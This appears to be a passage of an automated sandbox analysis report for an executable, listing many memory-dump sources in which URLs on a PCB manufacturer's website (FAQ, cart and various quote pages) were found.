                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/h
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
